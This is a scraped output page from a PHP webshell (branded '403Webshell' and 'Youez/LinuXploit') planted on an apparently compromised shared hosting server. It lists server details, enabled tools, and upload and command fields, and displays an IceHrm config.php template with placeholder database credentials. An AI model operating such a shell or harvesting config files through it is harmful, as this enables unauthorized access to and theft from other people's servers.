403Webshell
Server IP : 66.29.132.122  /  Your IP : 3.144.252.16
Web Server : LiteSpeed
System : Linux business142.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : admazpex ( 531)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/softaculous/icehrm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/softaculous/icehrm/config.php
<?php
ini_set('error_log', 'data/icehrm.log');

define('APP_NAME', 'Ice Hrm');
define('FB_URL', 'Ice Hrm');
define('TWITTER_URL', 'Ice Hrm');

define('CLIENT_NAME', 'app');
define('APP_BASE_PATH', '[[softpath]]/core/');
define('CLIENT_BASE_PATH', '[[softpath]]/app/');
define('BASE_URL','[[softurl]]/web/');
define('CLIENT_BASE_URL','[[softurl]]/app/');

define('APP_DB', '[[softdb]]');
define('APP_USERNAME', '[[softdbuser]]');
define('APP_PASSWORD', '[[softdbpass]]');
define('APP_HOST', '[[softdbhost]]');
define('APP_CON_STR', 'mysqli://'.APP_USERNAME.':'.APP_PASSWORD.'@'.APP_HOST.'/'.APP_DB);

//file upload
define('FILE_TYPES', 'jpg,png,jpeg');
define('MAX_FILE_SIZE_KB', 10 * 1024);

Youez - 2016 - github.com/yon3zu
LinuXploit